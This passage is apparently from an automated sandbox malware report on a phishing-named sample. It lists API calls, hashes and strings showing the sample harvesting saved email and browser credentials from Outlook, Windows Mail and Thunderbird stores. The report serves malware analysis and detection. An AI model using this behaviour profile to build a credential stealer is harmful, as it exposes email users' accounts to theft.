  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
  • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
• _mbscpy.MSVCRT(?,?), ref: 00402ECA
• _mbscpy.MSVCRT(?,?,?,?), ref: 00402EDD
• _mbscpy.MSVCRT(?,?), ref: 00402F6A
• _mbscpy.MSVCRT(?,?,?,?), ref: 00402F77
• RegCloseKey.ADVAPI32(?), ref: 00402FD1
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: _mbscpy$QueryValue$CloseOpen
• String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
• API String ID: 52435246-1534328989
• Opcode ID: 9103e5d61916334f965bee58fc86a4c23bf3386d7592c631d61422f450fe5fca
• Instruction ID: 5dbeba4814e3302d002d767d8bad135afcd275429644e03c8fd50da481ddfc04
• Opcode Fuzzy Hash: 9103e5d61916334f965bee58fc86a4c23bf3386d7592c631d61422f450fe5fca
• Instruction Fuzzy Hash: 7C512DB1900218BAEB51EB51CD46FDEB77CEF04744F1481A7B908A6191DBB89B84CF98
APIs
• EmptyClipboard.USER32 ref: 00406E06
  • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
• GetFileSize.KERNEL32(00000000,00000000), ref: 00406E23
• GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406E34
• GlobalLock.KERNEL32(00000000), ref: 00406E41
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406E54
• GlobalUnlock.KERNEL32(00000000), ref: 00406E63
• SetClipboardData.USER32(00000001,00000000), ref: 00406E6C
• GetLastError.KERNEL32 ref: 00406E74
• CloseHandle.KERNEL32(?), ref: 00406E80
• GetLastError.KERNEL32 ref: 00406E8B
• CloseClipboard.USER32 ref: 00406E94
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
• String ID:
• API String ID: 3604893535-0
• Opcode ID: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
• Instruction ID: a08a85c5be877f1b118c2cb4fdaf5607b5944e2b5e0e57495ee86e8d77b21b2f
• Opcode Fuzzy Hash: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
• Instruction Fuzzy Hash: A9114F39501205EFE7506FB4EC8CB9E7BB8EF05315F144175F506E22A1DB3489158AA9
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00406EA7
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00406EB4
                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040C360,?), ref: 00406EC3
                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00406ED0
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,00000001,?,?,?,?,0040C360,?), ref: 00406ED9
                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00406EE2
                                                                                                                                                                                                                                          • SetClipboardData.USER32(00000001,00000000), ref: 00406EEB
                                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 00406EFB
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3116012682-0
                                                                                                                                                                                                                                          • Opcode ID: cf45331a199c339a57bf15afb53481a6f1c327c5b86da421185a706dc513e21a
                                                                                                                                                                                                                                          • Instruction ID: 469d781c3ef94e65abf7249e996c377109e97d6fa28bdd4c6fbc6e531372765c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf45331a199c339a57bf15afb53481a6f1c327c5b86da421185a706dc513e21a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFF0BB3F1002196BD2502FA5FC8CE5B776CDB85B56709413DF906D2252DE34980447F9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                                                                                                          • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                                                                                                          • API String ID: 3963849919-1658304561
                                                                                                                                                                                                                                          • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                                                                                                          • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                                          • String ID: (yE$(yE$(yE
                                                                                                                                                                                                                                          • API String ID: 1865533344-362086290
                                                                                                                                                                                                                                          • Opcode ID: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                                                                                                                                                                          • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 004431AD
                                                                                                                                                                                                                                          • strncmp.MSVCRT ref: 004431BD
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000002,00000000,?,?,?,?), ref: 00443239
                                                                                                                                                                                                                                          • atoi.MSVCRT(00000000,?,00000002,00000000,?,?,?,?), ref: 0044324A
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00443276
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                                                                                                                                                                                                          • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                                                                                                                                          • API String ID: 1895597112-3210201812
                                                                                                                                                                                                                                          • Opcode ID: e45ea68b9b0540497a6261748f05aaaacbd89a4571b9254cd84bfcdfb871a6d6
                                                                                                                                                                                                                                          • Instruction ID: 70136e13f872b1b8ab9f6622f700308096b0d0b5c52b82b67a7483c56e51dea4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e45ea68b9b0540497a6261748f05aaaacbd89a4571b9254cd84bfcdfb871a6d6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AF10B718012589BDB22CF54C8487DEBBB4BB0278BF5485CAD8597B242C7B85B8DCF58
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                                                                                                                                                          • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                                                                                                                          • API String ID: 1714764973-479759155
                                                                                                                                                                                                                                          • Opcode ID: d90af57251aac8a93e41199de06fc6046491669e53ae360ecbf61914d176b5eb
                                                                                                                                                                                                                                          • Instruction ID: 3e95309f0516475de87f4a3b36a82bfae981417ea13aa6096d07c622cb899a74
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d90af57251aac8a93e41199de06fc6046491669e53ae360ecbf61914d176b5eb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB91A9726087056AF224BB36DD43B9F33D8EF4071DF20042FF85AA6182EE6DBA05461D
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040EBD8
                                                                                                                                                                                                                                            • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                                                                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                                                                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040EC2B
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040EC47
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040ECDD
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040ECF2
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040EDE1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                                                                                                                          • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                                                                                          • API String ID: 3137614212-1455797042
                                                                                                                                                                                                                                          • Opcode ID: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
                                                                                                                                                                                                                                          • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: _strcmpi$strlen$strncmp$atoimemcpy$memset
• String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
• API String ID: 2814039832-2206097438
• Opcode ID: 451ab8c14819fa341940ae35f9fedda05794e6cbdd5fcb9fbbdf8a0f2c3a169f
• Instruction ID: f11149d289dc999bf060bfe26817f696df6097fe02de34603fea895fe08660a4
• Opcode Fuzzy Hash: 451ab8c14819fa341940ae35f9fedda05794e6cbdd5fcb9fbbdf8a0f2c3a169f
• Instruction Fuzzy Hash: 11A1C932804206BAFF14ABA6DD02B9E77A4DF50328F20447FF405B71D1EB79AE55964C
APIs
  • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
  • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
  • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
  • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
• memset.MSVCRT ref: 0040E5B8
• memset.MSVCRT ref: 0040E5CD
• _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
• _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
• _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
• _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
• _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
• _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
• memset.MSVCRT ref: 0040E6B5
• memset.MSVCRT ref: 0040E6CC
  • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
  • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
• memset.MSVCRT ref: 0040E736
• memset.MSVCRT ref: 0040E74F
• sprintf.MSVCRT ref: 0040E76D
• sprintf.MSVCRT ref: 0040E788
• _strcmpi.MSVCRT ref: 0040E79E
• _strcmpi.MSVCRT ref: 0040E7B7
• _strcmpi.MSVCRT ref: 0040E7D3
• memset.MSVCRT ref: 0040E858
• sprintf.MSVCRT ref: 0040E873
• _strcmpi.MSVCRT ref: 0040E889
• _strcmpi.MSVCRT ref: 0040E8A5
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
• String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
• API String ID: 4171719235-3943159138
• Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
• Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
• Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
• Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
APIs
• GetDlgItem.USER32(?,000003E9), ref: 0041042E
• GetDlgItem.USER32(?,000003E8), ref: 0041043A
• GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
• GetWindowLongA.USER32(?,000000F0), ref: 00410455
• GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
• GetWindowLongA.USER32(?,000000EC), ref: 0041046A
• GetWindowRect.USER32(00000000,?), ref: 0041047C
• GetWindowRect.USER32(?,?), ref: 00410487
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
• GetDC.USER32 ref: 004104E2
• strlen.MSVCRT ref: 00410522
• GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
• ReleaseDC.USER32(?,?), ref: 00410580
• sprintf.MSVCRT ref: 00410640
• SetWindowTextA.USER32(?,?), ref: 00410654
• SetWindowTextA.USER32(?,00000000), ref: 00410672
• GetDlgItem.USER32(?,00000001), ref: 004106A8
• GetWindowRect.USER32(00000000,?), ref: 004106B8
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
• GetClientRect.USER32(?,?), ref: 004106DD
• GetWindowRect.USER32(?,?), ref: 004106E7
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
• GetClientRect.USER32(?,?), ref: 00410737
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
• String ID: %s:$EDIT$STATIC
• API String ID: 1703216249-3046471546
• Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
• Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
• Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
• Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
APIs
• memset.MSVCRT ref: 004024F5
  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
• _mbscpy.MSVCRT(?,00000000,?,?,?,7611E430,?,00000000), ref: 00402533
• _mbscpy.MSVCRT(?,?), ref: 004025FD
Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _mbscpy$QueryValuememset
                                                                                                                                                                                                                                          • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                                                                                          • API String ID: 168965057-606283353
                                                                                                                                                                                                                                          • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                                                                                                                                                          • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402869
                                                                                                                                                                                                                                            • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?,7611E430,?,00000000), ref: 004028A3
                                                                                                                                                                                                                                            • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,7611E430,?,00000000), ref: 0040297B
                                                                                                                                                                                                                                            • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                                                                                                                                          • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                                                                                                          • API String ID: 1497257669-167382505
                                                                                                                                                                                                                                          • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                                                                                          • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                                                                                                                                                                          APIs
